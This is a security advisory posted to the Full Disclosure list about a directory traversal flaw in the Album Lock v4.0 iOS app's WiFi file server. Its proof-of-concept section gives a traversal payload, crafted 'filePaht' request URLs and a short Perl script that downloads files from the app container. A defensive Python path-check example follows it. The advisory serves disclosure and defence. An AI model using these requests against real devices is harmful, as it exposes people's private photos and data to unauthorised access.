Monday, February 20, 2017

[FD] Album Lock v4.0 iOS - Directory Traversal Vulnerability

Document Title:
===============
Album Lock v4.0 iOS - Directory Traversal Vulnerability

References (Source):
====================
http://ift.tt/2lyrGOY

Release Date:
=============
2017-02-20

Vulnerability Laboratory ID (VL-ID):
====================================
2033

Common Vulnerability Scoring System:
====================================
7.2

Product & Service Introduction:
===============================
Do you have any secret photos and videos on your iPhone? Album Lock can protect your privacy perfectly. Album is the most convenient private Photo&Video app! You can add your SPECIAL photos&videos into AlbumLock; we provide many convenient ways: from the Photo app (Camera Roll), iTunes File Sharing Sync, WiFi Transfer and the in-app camera.

(Copy of the Homepage: http://ift.tt/2mdZ2j1 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 iOS mobile application.

Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the official Album Lock v4.0 iOS mobile web-application. The issue allows remote attackers to request and download local application files without authorization by manipulating path parameters.

The directory traversal web vulnerability is located in the `filePaht` parameter of the WiFi web-server interface. Remote attackers are able to request the local web-server during the sharing process to access application files without authentication. Attackers are able to access or download files via the `getObject` image path variables. Remote attackers are able to access the root `document` path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server web-application. Finally, an attacker with the credentials is able to access the service by using an HTTP client.

The security risk of the directory traversal vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 7.2. Exploitation of the web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking and mobile application compromise by unauthorized and unauthenticated access.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] getObject

Vulnerable Parameter(s):
[+] filePaht

Affected Module(s):
[+] Web-Server File System

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without user interaction or a privileged web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Standard Request:
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png

PoC: Payload
/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application

Malicious Request: Exploitation
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
http://localhost:8880/getImage?filePaht=/var/mobile/

PoC: Exploit
# Requests a file from the application container through the filePaht parameter
# and prints the response body.
use strict;
use warnings;
use LWP::UserAgent;

my $ua   = LWP::UserAgent->new();   # renamed from $b, which is Perl's special sort variable
my $host = "1.1.1.1:5555";          # host:port of the Album Lock WiFi web-server

print $ua->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
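As an added example (not code from the advisory or from the Album Lock app), the path check a hardened getImage handler should apply: the filePaht value is lexically normalised and must resolve strictly below the images directory, so every request in the PoC section above is refused while the standard request still succeeds. IMAGE_ROOT is assumed to be the ._alias_images directory quoted in the standard request.

```python
import posixpath
from typing import Optional, Tuple

# Constructed for this example: the directory the advisory's standard request
# serves images from (container UUID as quoted on the page). Everything served
# by getImage must live strictly below it.
IMAGE_ROOT = ("/var/mobile/Containers/Data/Application/"
              "FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images")


def resolve_image_path(root: str, requested: str) -> Optional[str]:
    """Return the normalised path for `requested` if it stays below `root`.

    The vulnerable endpoint accepts an absolute path in filePaht, so both
    forms are handled: an absolute value must already sit under root after
    lexical normalisation; a relative name is joined onto root first. Any
    result that is root itself or escapes it yields None.
    """
    if "\x00" in requested:          # an embedded NUL can truncate the path in C APIs
        return None
    root = posixpath.normpath(root)
    if requested.startswith("/"):
        candidate = posixpath.normpath(requested)
    else:
        candidate = posixpath.normpath(posixpath.join(root, requested))
    # normpath has already collapsed every "..", so a prefix test is enough
    if not candidate.startswith(root + "/"):
        return None
    return candidate


def handle_get_image(file_paht: str) -> Tuple[int, str]:
    """Mimic the getImage handler: (200, path) when allowed, else (403, reason)."""
    path = resolve_image_path(IMAGE_ROOT, file_paht)
    if path is None:
        return 403, "filePaht does not resolve below the image directory"
    return 200, path


if __name__ == "__main__":
    for value in (IMAGE_ROOT + "/fhhjjj/picture-00001.png",
                  "/var/mobile/",
                  "/var/mobile/Containers/Data/Application/"
                  "FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application"):
        print(value, "->", handle_get_image(value))
```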
